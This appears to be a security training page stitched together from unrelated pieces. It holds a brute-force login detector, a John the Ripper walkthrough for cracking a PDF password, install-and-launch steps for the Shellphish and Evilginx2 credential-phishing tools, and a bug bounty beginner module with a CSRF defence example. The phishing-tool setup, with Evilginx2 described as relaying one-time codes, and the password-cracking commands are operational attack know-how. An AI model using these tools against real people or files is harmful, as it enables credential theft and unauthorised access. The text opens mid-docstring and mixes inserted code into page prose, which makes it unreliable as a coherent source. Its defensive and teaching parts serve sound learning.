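The log lines are constructed for this example; their format (ISO timestamp,
outcome, account, source IP) is an assumption, not any real service's format.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta
import re

LOG_RE = re.compile(
    r"^(?P<ts>\S+) auth (?P<result>OK|FAIL) user=(?P<user>\S+) src=(?P<src>\S+)$"
)

# Constructed sample log: one burst against "alice", a few scattered typos by "bob".
SAMPLE_LOG = """\
2024-01-01T10:00:00 auth FAIL user=alice src=203.0.113.7
2024-01-01T10:00:01 auth FAIL user=alice src=203.0.113.7
2024-01-01T10:00:01 auth FAIL user=alice src=203.0.113.7
2024-01-01T10:00:02 auth FAIL user=alice src=203.0.113.7
2024-01-01T10:00:02 auth FAIL user=alice src=203.0.113.7
2024-01-01T10:00:03 auth OK user=alice src=203.0.113.7
2024-01-01T10:00:05 auth FAIL user=bob src=198.51.100.2
2024-01-01T10:05:00 auth FAIL user=bob src=198.51.100.2
2024-01-01T10:10:00 auth FAIL user=bob src=198.51.100.2
2024-01-01T10:10:30 auth OK user=bob src=198.51.100.2
"""


def parse(line):
    """Return (timestamp, result, user, src) or None for lines we don't understand."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return datetime.fromisoformat(m["ts"]), m["result"], m["user"], m["src"]


def detect(log_text, window_seconds=60, threshold=5):
    """Alert on (src, user) pairs with >= threshold failures inside a sliding window.

    Each alert records when the threshold was crossed and whether a success
    followed the burst, the case worth treating as a probable compromise.
    """
    window = timedelta(seconds=window_seconds)
    failures = defaultdict(deque)   # (src, user) -> timestamps of recent failures
    alerts = {}
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        ts, result, user, src = rec
        key = (src, user)
        q = failures[key]
        if result == "FAIL":
            q.append(ts)
            while q and ts - q[0] > window:   # drop failures older than the window
                q.popleft()
            if len(q) >= threshold and key not in alerts:
                alerts[key] = {"first_seen": ts, "failures": len(q), "success_after": False}
        elif key in alerts:
            alerts[key]["success_after"] = True   # guessing burst ended in a login
    return alerts


if __name__ == "__main__":
    for (src, user), info in detect(SAMPLE_LOG).items():
        print(f"{src} -> {user}: {info['failures']} failures from {info['first_seen']}, "
              f"success afterwards: {info['success_after']}")
```

The window slides per (source, account) pair so that bob's three typos spread over ten minutes never accumulate, while alice's five failures in two seconds do; raising the window or lowering the threshold trades sensitivity for noise, as the second assertion below shows.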


CRACK A PDF PASSWORD WITH BRUTE FORCE USING JOHN THE RIPPER

John the Ripper is a fast password cracker, currently available for many flavors of Unix, macOS, Windows, DOS, BeOS, and OpenVMS (the latter requires a contributed patch). Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos/AFS and Windows LM hashes, as well as DES-based tripcodes, plus hundreds of additional hashes and ciphers in "-jumbo" versions. In this topic we will explain how to try to crack a password-protected PDF using a brute-force attack with JohnTheRipper.

1. BUILD JOHNTHERIPPER BINARIES

We will need to work with the Jumbo version of JohnTheRipper. This is a community-enhanced, "jumbo" version of John the Ripper. It has a lot of code, documentation, and data contributed by the user community. This is not "official" John the Ripper code. It is very easy for new code to be added to jumbo: the quality requirements are low. This means that you get a lot of functionality that is not "mature" enough or is otherwise inappropriate for the official JtR, which in turn also means that bugs in this code are to be expected. Obtain the source code of JohnTheRipper (the "bleeding-jumbo" branch, the default, is based on 1.8.0-Jumbo-1) from the repository on GitHub with the following command (or download the zip and extract it into some directory):

git clone https://github.com/magnumripper/JohnTheRipper.git

This will create a directory named JohnTheRipper in the current directory. You can read more about the "Jumbo" version of JohnTheRipper on the official website or visit the unofficial code repository on GitHub. Switch to the src directory of JohnTheRipper:

cd ./JohnTheRipper/src

Download the package lists from the repositories:

sudo apt-get update

And install libssl:

sudo apt-get install libssl-dev

The build requires libssl (OpenSSL) to be installed on your system, so in case you don't have it the previous command takes care of this requirement. Inside the src directory, proceed with the build:

./configure && make

This version of Jumbo has autoconf that supports the very common chain, allowing you to compile the sources on a Unix-like system. Once the build process finishes, switch to the run directory inside the JohnTheRipper directory:

cd ..
cd ./run

Inside this directory you will find (after the build) all the tools that the project has to offer, including john itself; list the directory to compare:

ls

You will see all the tools of JohnTheRipper inside this directory:

Now that you have the tools, let's get started with the brute-force attack.

2. GENERATE PDF HASH FILE

JohnTheRipper, as mentioned at the beginning of the article, is not itself about PDFs but about passwords and security in general. That's why you will need to create the hash file of the PDF using the pdf2john.pl tool (available in the run directory after compiling from source). This Perl script reads the encryption metadata of the file and produces the hash, which can be written to a new file with the following command:

pdf2john.pl /root/Desktop/pdf_protected.pdf > /root/Desktop/pdf.hash

This command will create a .hash file in the given directory. This is the file that we will use with the JohnTheRipper tool:

The pdf.hash file contains text like:

/root/Desktop/pdf_protected.pdf:$pdf$4*4*128*4*1*16*d22933dd530666ced293ccf5f860214f*32*ab12d2e30eae3d43d69ac57efc2918c128bf4e5e4e758a4164004e56fffa0108*32*07419b7fe590bdc9926bb9750adeedb8c07b5407d9b5314c012d16e25e9e7f20

Now that we have the hash file, we can proceed with the brute forcing using the john CLI tool.

3. BRUTE FORCE WITH JOHN

Now that we have the .hash file of the password-protected PDF that we want to unlock, we just need to pass the file as an argument to the JohnTheRipper CLI tool (in the run directory):

john /root/Desktop/pdf.hash

This will use UTF-8 as the default input encoding and will start to guess the password of the PDF file using the default wordlist of the project. If it's found, it will display the password and the path to the protected PDF:
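To see what pdf2john actually extracted, here is an added example, not part of the page or of John the Ripper, that parses the `$pdf$` line above into its fields: the PDF encryption /V and /R values, the key length, the /P permission flags, whether metadata is encrypted, and the /ID, /U and /O entries, checking that each hex field matches its declared byte length. The sample is the page's own hash line with the whitespace the PDF export inserted into the /U field removed. Nothing here recovers a password; it only exposes the metadata the cracker works from, which is what you need when judging whether a document's protection (RC4-40 versus AES-128, for example) is worth anything.

```python
"""Parse a pdf2john `$pdf$` hash line into its fields (added example).

Format emitted by pdf2john for /R <= 4 documents, as seen on the page:
    [file:]$pdf$V*R*Length*P*EncryptMetadata*IDlen*ID*Ulen*U*Olen*O
Field names follow the PDF standard security handler (/V, /R, /Length, /P,
/EncryptMetadata, /ID, /U, /O). The sample line is the page's own hash,
rejoined where the export broke the /U field with whitespace.
"""
from dataclasses import dataclass
import re

SAMPLE = (
    "/root/Desktop/pdf_protected.pdf:$pdf$4*4*128*4*1*16*"
    "d22933dd530666ced293ccf5f860214f*32*"
    "ab12d2e30eae3d43d69ac57efc2918c128bf4e5e4e758a4164004e56fffa0108*32*"
    "07419b7fe590bdc9926bb9750adeedb8c07b5407d9b5314c012d16e25e9e7f20"
)

# /V values of the standard security handler and what they imply
CIPHER_BY_V = {
    1: "RC4 40-bit",
    2: "RC4 (variable key length)",
    4: "crypt filters (AESV2 128-bit or RC4)",
    5: "AESV3 (AES-256)",
}


@dataclass
class PdfHash:
    source_file: str
    v: int
    r: int
    key_bits: int
    p: int
    encrypt_metadata: bool
    doc_id: bytes
    u: bytes
    o: bytes

    @property
    def cipher(self) -> str:
        return CIPHER_BY_V.get(self.v, f"unknown /V {self.v}")

    @property
    def print_allowed(self) -> bool:
        # Bit 3 of /P (value 4) grants printing in the standard security handler.
        return bool(self.p & 4)


def _hexfield(declared_len: str, hexstr: str, name: str) -> bytes:
    """Decode a hex field and check it against the byte length pdf2john declared."""
    raw = bytes.fromhex(hexstr)
    if len(raw) != int(declared_len):
        raise ValueError(f"{name}: declared {declared_len} bytes, got {len(raw)}")
    return raw


def parse_pdf_hash(line: str) -> PdfHash:
    line = re.sub(r"\s+", "", line)          # undo line-wrapping damage
    if ":$pdf$" in line:
        source, rest = line.split(":$pdf$", 1)
    elif line.startswith("$pdf$"):
        source, rest = "", line[len("$pdf$"):]
    else:
        raise ValueError("not a $pdf$ hash line")
    f = rest.split("*")
    if len(f) != 11:
        raise ValueError(f"expected 11 fields, got {len(f)}")
    v, r, key_bits, p, enc_meta = (int(x) for x in f[:5])
    return PdfHash(source, v, r, key_bits, p, enc_meta == 1,
                   _hexfield(f[5], f[6], "/ID"),
                   _hexfield(f[7], f[8], "/U"),
                   _hexfield(f[9], f[10], "/O"))


if __name__ == "__main__":
    h = parse_pdf_hash(SAMPLE)
    print(f"{h.source_file}: /V={h.v} /R={h.r} {h.key_bits}-bit, {h.cipher}, "
          f"metadata encrypted={h.encrypt_metadata}, print allowed={h.print_allowed}")
```

The length checks matter in practice: a hash line that was wrapped or truncated when copied (exactly what happened to this page's /U field) is the usual reason john reports no loadable hashes, and the parser rejects it with a message that names the damaged field.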

If you run the command on the same file again after the password has been guessed, you will see one of the messages "No password hashes loaded", "No password hashes loaded (see FAQ)", or "No password hashes left to crack (see FAQ)". Cracked passwords are printed to the terminal and saved in the file $JOHN/john.pot (in the documentation and in the configuration file for John, "$JOHN" refers to John's "home directory"; which directory it really is depends on how you installed John). The $JOHN/john.pot file is also used to avoid loading password hashes that you have already cracked when you run John the next time. In that case, you can display the password of the same file again using the --show flag:

john --show /root/Desktop/pdf.hash

So the password will be shown (in our case 54321):


USING A CUSTOM WORD LIST

If you don't want to use the default password.lst file of JohnTheRipper, just specify the path to the new file with the --wordlist argument:

john --wordlist=password.lst /root/Desktop/pdf.hash

As a final recommendation: the tool can crack many more file types, so you may want to read its documentation. The rest of the documentation is located in separate files, listed here in the recommended order of reading:

INSTALL - installation instructions
OPTIONS - command line options and additional utilities
EXAMPLES - usage examples - strongly recommended
MODES - cracking modes: what they are
FAQ - frequently asked questions
BUGS - list of known bugs
DYNAMIC - how to use dynamic format in JtR
DYNAMIC COMPILER FORMATS - list of known hash formats built using the dynamic compiler
DYNAMIC_SCRIPTING - how to build/optimise a format that uses dynamic
README.bash-completion - how to enable bash completion for JtR
CONTACT (*) - how to contact the author or otherwise obtain support
CONFIG (*) - how to customize
EXTERNAL (*) - defining an external mode
RULES (*) - wordlist rules syntax
CHANGES (*) - history of changes
CREDITS (*) - credits
LICENSE - copyrights and licensing terms
COPYING - GNU GPL version 2, as referenced by LICENSE above

(*) most users can safely skip these.


SHELLPHISH: A PHISHING TOOL

Shellphish is an interesting tool that we came across that illustrates just how easy and powerful phishing tools have become today. The tool leverages some of the templates generated by another tool called SocialFish. It offers phishing templates for 18 popular sites, the majority focused on social media and email providers. There is also an option to use a custom template if so desired.

INSTALLATION

Shellphish is fairly straightforward to install. It can be done on your Linux of choice; we will be using Kali. We fire up our Kali Linux and use the terminal to navigate to the desktop:

cd Desktop

We need to clone ShellPhish from GitHub; the download link is provided below.

git clone https://github.com/thelinuxchoice/shellphish.git

This makes a folder named “shellphish” on our desktop. Let’s check the folder and its contents:

ls
cd shellphish/
ls

The next step is to change the permissions of the shellphish.sh file so that we as the admin can use it. We don’t want everyone to have open access to it.

chmod 744 shellphish.sh

And that’s it; now we can launch the phishing tool:

./shellphish.sh

EXPLORING TEMPLATES

ShellPhish offers us 18 prebuilt templates; we will look through three of them to get an idea of what someone on the receiving end sees when they get a link generated by this tool. Take the Instagram page. The platform needs no introduction. We can see what the malicious link leads to: the page it shows is very convincing and might easily fool someone who isn’t paying attention.


EVILGINX2: ADVANCED PHISHING ATTACK FRAMEWORK

One of the biggest concerns in today’s cyberspace is phishing; it’s one of those things that uses what a user is familiar with against them. Evilginx2 is a MITM attack framework that sits between the user and the site they are trying to access in order to steal their credentials. Because it relays the real site and its session, one-time codes entered by the victim are relayed too; only origin-bound authenticators such as FIDO2/WebAuthn security keys, which refuse to sign for the proxy's domain, defeat this class of attack. The framework is written in Go and implements its own HTTP and DNS server, making the setup process a breeze.

INSTALLATION

go get -u github.com/kgretzky/evilginx2
cd $GOPATH/src/github.com/kgretzky/evilginx2
make
make install


MODULE 03: GETTING STARTED IN BUG BOUNTY HUNTING


NO ONE WILL TELL YOU ANYTHING OR EVERYTHING ABOUT THIS FIELD; IT’S A LONG, STRANGE PATH, BUT YOU HAVE TO TRAVEL IT ALONE WITH LITTLE HELP FROM OTHERS.

Bug bounty hunting is an exciting field to be in today. To define bug bounty in simple words, I’ll say: “A bug bounty is a reward paid to an ethical hacker for identifying and disclosing a potential security bug found in a participant’s web, mobile or system.” But I hope, as you’re here already, that you know enough about bug bounty hunting that I don’t need to define it before getting into the usual basics.

First of all, I want you to read the article by Eric Raymond: http://www.catb.org/esr/faqs/hackerhowto.html. For me it has become the standard guideline for starters. As mentioned in that article, one of the most important things you need to have if you want to become a hacker is attitude!

“To be a hacker, you have to develop some of these attitudes. But copping an attitude alone won’t make you a hacker, any more than it will make you a champion athlete or a rock star. Becoming a hacker will take intelligence, practice, dedication, and hard work. Therefore, you have to learn to distrust attitude and respect competence of every kind. Hackers won’t let posers waste their time, but they worship competence — especially competence at hacking, but competence at anything is valued. Competence at demanding skills that few can master is especially good, and competence at demanding skills that involve mental acuteness, craft, and concentration is best. If you revere competence, you’ll enjoy developing it in yourself — the hard work and dedication will become a kind of intense play rather than drudgery. That attitude is vital to becoming a hacker.”

What should you know before starting to learn about bug bounty hunting? I’ll be writing this topic (Getting Started in Bug Bounty Hunting) in three major phases, where I’ll break things down to be as easy as possible, because the main audience I have in mind right now is absolute beginners, or those who have already tried learning or working but failed for some reason…

PHASE #01

Phase 01 is based on the basics of network communication, programming & automation. First of all, to work on anything you need to know some very basic things, including how a system works and how you can make changes to it. Now let’s start from the very basics.

Web, HTTP & Network Basics:

Web: Just for an overview, you should read one of these:

https://www.tutorialspoint.com/web_developers_guide/web_basic_concepts.htm
https://developers.google.com/web/fundamentals/security/
http://www.alphadevx.com/a/7-The-Basics-of-Web-Technologies
http://www.cs.kent.edu/~svirdi/Ebook/wdp/ch01.pdf

HTTP: Communication is the key to success, so in order to learn how something works, in our case how an application works and what its flow is, we need to learn how it communicates with you, and the most basic thing I can think of is knowing about HTTP. Here are a few places you should definitely visit to get an idea about HTTP:

https://www.w3.org/Protocols/
https://www.w3schools.com/whatis/whatis_http.asp
https://www.tutorialspoint.com/http/http_status_codes.htm
https://www.tutorialspoint.com/http/http_url_encoding.htm
https://www.tutorialspoint.com/http/http_requests.htm
https://www.tutorialspoint.com/http/http_responses.htm
https://www.hacker101.com/sessions/web_in_depth

What you’ll basically learn from these is the HTTP protocol, HTTP requests, responses, status codes and encoding/decoding, and from the last URL you’ll learn about it from a security perspective: SOP, cookies, MIME & HTML parsing. These will definitely help you later with web app testing.

Networking: A basic understanding of networking is important for anyone who works with computers. Here are a few resources for learning the basics of networking:

https://commotionwireless.net/docs/cck/networking/learn-networking-basics/
https://www.slideshare.net/variwalia/basic-to-advanced-networking-tutorials
https://www.cisco.com/c/en/us/solutions/small-business/resource-center/networking/networking-basics.html
http://www.penguintutor.com/linux/basic-network-reference
https://www.utilizewindows.com/list-of-common-network-port-numbers/
https://code.tutsplus.com/tutorials/an-introduction-to-learning-and-using-dns-records–cms-24704
https://www.digitalocean.com/community/tutorials/an-introduction-to-networking-terminology-interfaces-andprotocols

What you’ll learn from these are the basics of networking, TCP/IP, DNS and network terminology. These will definitely help you later with the recon process.

LEARN TO MAKE IT; THEN BREAK IT!

Programming/Coding: To be a good hacker you don’t really need to be a good programmer, but it’s always good to cover this before going into any form of computer hacking or bug bounty in general. It sometimes increases your chances of successfully identifying and exploiting a vulnerability, and you may also need code to escalate a bug of low/medium severity to high/critical. I’ll suggest a few languages that one should have basic to medium level knowledge of, and keep advancing it.

HTML:

https://www.w3schools.com/html/
https://www.codecademy.com/learn/learn-html
https://learn.shayhowe.com/advanced-html-css/
https://htmldog.com/guides/html/advanced/

PHP:

https://www.w3schools.com/php/
https://stackify.com/learn-php-tutorials/
https://www.codecademy.com/learn/learn-php
https://www.guru99.com/php-tutorials.html
https://www.codecademy.com/learn/paths/web-development

JavaScript:

https://www.codecademy.com/learn/introduction-to-javascript
https://learnjavascript.today/
https://www.thebalancecareers.com/learn-javascript-online-2071405

SQL (Structured Query Language):

https://www.w3schools.com/sql/
https://www.codecademy.com/learn/learn-sql
http://www.sqlcourse.com/

C/C++:

https://www.learncpp.com/
https://www.codecademy.com/learn/learn-c-plus-plus
https://www.sololearn.com/Course/CPlusPlus/
https://www.learn-c.org/

Java:

https://www.codecademy.com/learn/learn-java
https://www.geeksforgeeks.org/java-how-to-start-learning-java/
https://www.learnjavaonline.org/

What you’ll learn from these is not just programming languages but the proper way the web and the systems you are going to test communicate. I’m no expert, or even a starter; I’m just a learner in programming, so I’m sharing the resources I’m currently following. As you know, XSS, HTML injection, PHP injection, SQLi and many other vulnerabilities can’t be exploited properly unless you know the code that runs behind them and exactly how to communicate with it, so that’s why learning them is important to get a good start.

Adding Automation to your work:

“NEVER SEND A HUMAN TO DO A MACHINE’S JOB”

As you know, sometimes you need to do your work faster and more efficiently, and the best way I know for that is automating your work.

Python:

https://realpython.com/
https://comparite.ch/python-courses (By AIMEE O’DRISCOLL)
https://docs.python.org/3/tutorial/

Bash:

https://www.tutorialspoint.com/unix/shell_scripting.htm
https://www.learnshell.org/
https://medium.com/quick-code/top-tutorials-to-learn-shell-scripting-on-linux-platform-c250f375e0e5

Ruby:

https://www.learnrubyonline.org/
https://www.codecademy.com/learn/learn-ruby

Golang:

https://tour.golang.org/welcome/1
https://www.udemy.com/learn-go-the-complete-bootcamp-course-golang/

What you’ll learn from these is to code your own tools, understand many other common tools and modify them according to your needs. Of course one can’t learn all of these, but you should try to get a grip on the one you like and get to understand the others. So, if by this point you already know all the basics, are good with PHP, JS & HTML, and are also good with scripting & SQL, or have at least learned a bit of these and given it some time, I’d say a few weeks maybe, then congrats: you have already gone through Phase #01, which means you have done 39% of the learning work towards being a good bug hunter/ethical hacker.

PHASE #02

Phase 02 is based on learning about vulnerabilities, resources to follow to learn them, places to practice, tools, etc.

“BEING A HACKER IS LOTS OF FUN, BUT IT’S A KIND OF FUN THAT TAKES LOTS OF EFFORT. THE EFFORT TAKES MOTIVATION.”

Now let’s start with the basics of learning about InfoSec. The first and really most important step is to choose a proper initial path on which you are going to start learning. Choosing the right path to start in bug bounty is very important. It totally depends on your interests; some people choose the web application path first because it’s easier to learn and go through than mobile and others…

I’ll focus on web & mobile here because that is where my interest lies. Before I add anything else, I’ll suggest you actually go through:

Hacker101 by HackerOne: https://www.hacker101.com/
Bugcrowd University: https://www.bugcrowd.com/hackers/bugcrowd-university/

Both of these contain a huge list of resources and lectures that can help you even better than many of us can, but as you are following this as well, I decided to add them here too.

Web App Security: Before I suggest what to learn first if you follow my suggested path, I’d like to tell you some ways you can practice your skills.

CTF (Capture The Flag): To practice for bug bounties you can participate in CTF challenges. Just like the name suggests, “Capture The Flag” consists of several challenges for you to solve which deal with real-world vulnerabilities. The more you practice on these challenges, the more you will learn about the different technologies required to break into an application or a system.

For web apps, I’ll suggest you read the following books & guides first:

https://www.packtpub.com/networking-and-servers/mastering-modern-web-penetration-testing
https://www.amazon.com/Hackers-Underground-Handbook-secure-systems/dp/1451550189
https://leanpub.com/web-hacking-101
https://www.amazon.com/gp/product/1593275641/
https://www.amazon.com/gp/product/1512214566/
https://www.amazon.com/Tangled-Web-Securing-Modern-Applications-ebook/dp/B006FZ3UNI/

Reading these books you will get good, in-depth knowledge about web app penetration testing & security testing in general. In addition to these books, I suggest you really give good time to reading and understanding the OWASP Testing Guide & the OWASP Top 10 vulnerabilities from 2010-2017.

OWASP Testing project: https://www.owasp.org/index.php/OWASP_Testing_Project

OWASP Top 10 Project:

https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project#OWASP_Top_10_for_2010
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project#OWASP_Top_10_for_2013

Adding a few basic PDFs for you to go through and save locally so you can keep revising and learning from them. I’d say they are going to help you almost a hundred percent of the time, so do give these a good time:

Kali Linux Revealed: https://kali.training/downloads/Kali-Linux-Revealed-1st-edition.pdf
Nmap Cheat Sheet: https://s3-us-west-2.amazonaws.com/stationx-public-download/nmap_cheet_sheet_0.6.pdf
Metasploit Cheat Sheet: https://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf

Now by this point I’d say you have done enough research and given enough time to practice and learn that you can jump into a bug bounty program to test in a real-life environment outside CTFs or test environments. So you can happily jump to the pages at

https://bugcrowd.com/programs
https://hackerone.com/directory

and select a program, but I’ll suggest you read till the end.

PentesterLab: There’s only one way to properly learn web penetration testing: by getting your hands dirty. PentesterLab teaches how to manually find and exploit vulnerabilities and is a good resource to learn and practice all at once.

Pentester Academy: Another great resource to practice using online labs and learn; they also provide certifications.

Having followed all of those books and testing guides you might have an idea of vulnerabilities, so I’ll name a few common ones and try to give good references to learn them easily.

Cross-Site Request Forgery (CSRF)

Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated.

References to read:

https://www.imperva.com/learn/application-security/csrf-cross-site-request-forgery/?utm_campaign=Incapsulamoved
https://www.netsparker.com/blog/web-security/csrf-cross-site-request-forgery/

Some POCs:

CSRF Account Takeover famebit by Hassan Khan
Hacking PayPal Accounts with one click (Patched) by Yasser Ali
Add tweet to collection CSRF by vijay kumar
Facebookmarketingdevelopers.com: Proxies, CSRF Quandry and API Fun by phwd
How i Hacked your Beats account ? Apple Bug Bounty by @aaditya_purani
Paypal bug bounty: Updating the Paypal.me profile picture without consent (CSRF attack) by Florian Courtial
Uber CSRF Account Takeover by Ron Chan
Messenger.com CSRF that show you the steps when you check for CSRF by Jack Whitton
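What every report in the list above has in common is a state-changing request that the server accepted on the strength of the browser's cookies alone. The defence is proof of intent that an attacker's page cannot forge: a per-session secret echoed back in the request, backed by an Origin check. The following is an added example, not from the page or from any of the write-ups; it implements synchronizer-token validation with an Origin/Referer check over requests modelled as plain dicts, and shows an in-session request passing while a cross-site one is rejected. The request representation, the session store and the site origin are assumptions.

```python
"""Synchronizer-token CSRF protection with an Origin check (added example).

Requests and sessions are plain dicts; no web framework is involved. The
origin and the sample requests are constructed for the example.
"""
import hmac
import secrets
from urllib.parse import urlsplit

SITE_ORIGIN = "https://example.test"          # constructed site origin
SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}      # must never change state


def new_session():
    """Create a session carrying a fresh, unguessable CSRF token."""
    return {"user": "alice", "csrf_token": secrets.token_urlsafe(32)}


def render_form(session):
    """The server embeds the session's token in every state-changing form."""
    return {"action": "/account/email", "csrf_token": session["csrf_token"]}


def check_csrf(request, session):
    """Return (ok, reason) for a request arriving with a valid session cookie."""
    if request["method"] in SAFE_METHODS:
        return True, "safe method"
    # Layer 1: browsers attach Origin to cross-site POSTs and a page cannot
    # alter it, so a foreign origin is rejected outright.
    origin = request["headers"].get("Origin") or request["headers"].get("Referer")
    if origin:
        parts = urlsplit(origin)
        seen = f"{parts.scheme}://{parts.netloc}"
        if seen != SITE_ORIGIN:
            return False, f"cross-site origin {seen}"
    # Layer 2: the token in the body must match the session's token. The
    # attacker's page cannot read it, so a forged request cannot supply it.
    submitted = request["form"].get("csrf_token", "")
    if not hmac.compare_digest(submitted.encode(), session["csrf_token"].encode()):
        return False, "missing or wrong CSRF token"
    return True, "token valid"


def legitimate_request(session):
    """Constructed: the user submits the form our site rendered for them."""
    form = render_form(session)
    return {"method": "POST", "headers": {"Origin": SITE_ORIGIN},
            "form": {"email": "alice@example.test", "csrf_token": form["csrf_token"]}}


def forged_request():
    """Constructed: an attacker page auto-submits a form in the victim's browser.

    The browser adds the victim's cookies, so the session is valid, but the
    Origin is the attacker's and the token is unknown to them.
    """
    return {"method": "POST", "headers": {"Origin": "https://attacker.test"},
            "form": {"email": "attacker@attacker.test"}}


if __name__ == "__main__":
    s = new_session()
    print("legitimate:", check_csrf(legitimate_request(s), s))
    print("forged    :", check_csrf(forged_request(), s))
```

The token check is what actually carries the protection; the Origin check is a cheap first line that also catches requests from clients that strip the token. Comparing with `hmac.compare_digest` rather than `==` avoids leaking the token through timing, and a SameSite=Lax or Strict attribute on the session cookie adds a third, browser-enforced layer that this model does not show.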

Cross-Site Scripting (XSS)
XSS enables attackers to inject client-side scripts into web pages viewed by other users.

References to read:

https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
https://portswigger.net/web-security/cross-site-scripting
https://excess-xss.com/

Some POCs:

AirBnb Bug Bounty: Turning Self-XSS into Good-XSS #2 by geekboy
Uber Self XSS to Global XSS
How I found a $5,000 Google Maps XSS (by fiddling with Protobuf) by Marin Moulinier
Airbnb – When Bypassing JSON Encoding, XSS Filter, WAF, CSP, and Auditor turns into Eight Vulnerabilities by Brett
XSSI, Client Side Brute Force
postMessage XSS Bypass
XSS in Uber via Cookie by zhchbin
Stealing contact form data on www.hackerone.com using Marketo Forms XSS with postMessage frame-jumping and jQuery-JSONP by frans
XSS due to improper regex in third party js
Uber 7k XSS
XSS in TinyMCE 2.4.0 by Jelmer de Hen
Pass uncoded URL in IE11 to cause XSS
Twitter XSS by stopping redirection and javascript scheme by Sergey Bobrov
Microsoft XSS and Twitter XSS
Google Japan Book XSS
Flash XSS mega nz – by frans
Flash XSS in multiple libraries – by Olivier Beg
xss in google IE, Host Header Reflection
Years ago Google xss
xss in google by IE weird behavior
xss in Yahoo Fantasy Sport
xss in Yahoo Mail Again, worth $10000 by Klikki Oy
Sleeping XSS in Google by securityguard
Decoding a .htpasswd to earn a payload of money by securityguard
Google Account Takeover
Sleeping stored Google XSS Awakens a $5000 Bounty by Patrik Fehrenbach
RPO that lead to information leakage in Google by filedescriptor
God-like XSS, Log-in, Log-out, Log-in in Uber by Jack Whitton
Three Stored XSS in Facebook by Nirgoldshlager
Using a Braun Shaver to Bypass XSS Audit and WAF by Frans Rosen
An XSS on Facebook via PNGs & Wonky Content Types by Jack Whitton
Stored XSS in *.ebay.com by Jack Whitton
Complicated, Best Report of Google XSS by Ramzes
Tricky Html Injection and Possible XSS in sms-be-vip.twitter.com by secgeek
Command Injection in Google Console by Venkat S
Facebook's Moves – OAuth XSS by PAULOS YIBELO
Stored XSS in Google Docs (Bug Bounty) by Harry M Gertos
Stored XSS on developer.uber.com via admin account compromise in Uber by James Kettle (albinowax)
Yahoo Mail stored XSS by Klikki Oy
Abusing XSS Filter: One ^ leads to XSS (CVE-2016-3212) by Masato Kinugawa
Youtube XSS by fransrosen
Best Google XSS again – by Krzysztof Kotowicz
IE & Edge URL parsing Problem – by detectify
Google XSS subdomain Clickjacking

SQL Injection
SQL injection is a common attack vector that uses malicious SQL code for backend database manipulation to access information that was not intended to be displayed.

References to read:

https://www.owasp.org/index.php/SQL_Injection
https://portswigger.net/web-security/sql-injection
https://www.imperva.com/learn/application-security/sql-injection-sqli/
https://www.w3schools.com/sql/sql_injection.asp

Some POCs:

SQL Injection Vulnerability nutanix by Muhammad Khizer Javed
Yahoo – Root Access SQL Injection – tw.yahoo.com by Brett Buerhaus
Multiple vulnerabilities in a WordPress plugin at drive.uber.com by Abood Nour (syndr0me)
GitHub Enterprise SQL Injection by Orange
SQL injection in WordPress Plugin Huge IT Video Gallery in Uber by glc
SQL Injection on sctrack.email.uber.com.cn by Orange Tsai

Remote Code Execution (RCE)
In RCE, an attacker is able to execute arbitrary commands or code on a target machine.

References to read:

https://www.netsparker.com/blog/web-security/remote-code-evaluation-execution/
https://en.wikipedia.org/wiki/Arbitrary_code_execution

Some POCs:

How we broke PHP, hacked Pornhub and earned $20,000 by Ruslan Habalov
RCE deal to tricky file upload by secgeek
WordPress SOME bug in plupload.flash.swf leading to RCE in Automatic by Cure53 (cure53)
Read-Only user can execute arbitrary shell commands on AirOS by 93c08539 (93c08539)
Remote Code Execution by image upload! by Raz0r (ru_raz0r)
Popping a shell on the Oculus developer portal by Bitquark
Crazy! PornHub RCE AGAIN!!!
How I hacked Pornhub for fun and profit – 10,000$ by 5haked
PayPal Node.js code injection (RCE) by Michael Stepankin
eBay PHP Parameter Injection lead to RCE
Yahoo Acquisition RCE
Command Injection Vulnerability in Hostinger by @alberto__segura
RCE in Airbnb by Ruby Injection by buer
RCE in Imgur by Command Line
RCE in git.imgur.com by abusing out dated software by Orange Tsai
RCE in Disclosure
Remote Code Execution by struct2 Yahoo Server
Command Injection in Yahoo Acquisition
Paypal RCE
$50k RCE in JetBrains IDE
$20k RCE in Jenkin Instance by @nahamsec
JDWP Remote Code Execution in PayPal by Milan A Solanki
XXE in OpenID: one bug to rule them all, or how I found a Remote Code Execution flaw affecting Facebook's servers by Reginaldo Silva
How I Hacked Facebook, and Found Someone's Backdoor Script by Orange Tsai
How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! by Orange Tsai
uber.com may RCE by Flask Jinja2 Template Injection by Orange Tsai
Yahoo Bug Bounty – *.login.yahoo.com Remote Code Execution by Orange Tsai (in Chinese)
Google App Engine RCE by Ezequiel Pereira
Exploiting ImageMagick to get RCE on Polyvore (Yahoo Acquisition) by NaHamSec
Exploiting ImageMagick to get RCE on HackerOne by c666a323be94d57
Trello bug bounty: Access server's files using ImageTragick by Florian Courtial
40k fb rce
Yahoo Bleed 1
Yahoo Bleed 2
Microsoft Apache Solr RCE Velocity Template by Muhammad Khizer Javed

Insecure Direct Object Reference (IDOR)
In IDOR, an application provides direct access to objects based on user-supplied input. As a result of this vulnerability, attackers can bypass authorization and access resources in the system directly.

References to read:

https://www.bugcrowd.com/blog/how-to-find-idor-insecure-direct-object-reference-vulnerabilities-for-largebounty-rewards/
https://www.secjuice.com/idor-insecure-direct-object-reference-definition/

Some POCs:

DOB disclosed using "Facebook Graph API Reverse Engineering" by Raja Sekar Durairaj
Change the description of a video without publish_actions permission in Facebook by phwd
Response To Request Injection (RTRI) by ? (to be honest, thanks to this article I have found quite a few bugs by using his method; respect to the author!)
Leak of all project names and all user names, even across applications on Harvest by Edgar Boda-Majer (eboda)
Changing paymentProfileUuid when booking a trip allows free rides at Uber by Matthew Temmy (temmyscript)
View private tweet
Uber Enum UUID
Hacking Facebook's Legacy API, Part 1: Making Calls on Behalf of Any User by Stephen Sclafani
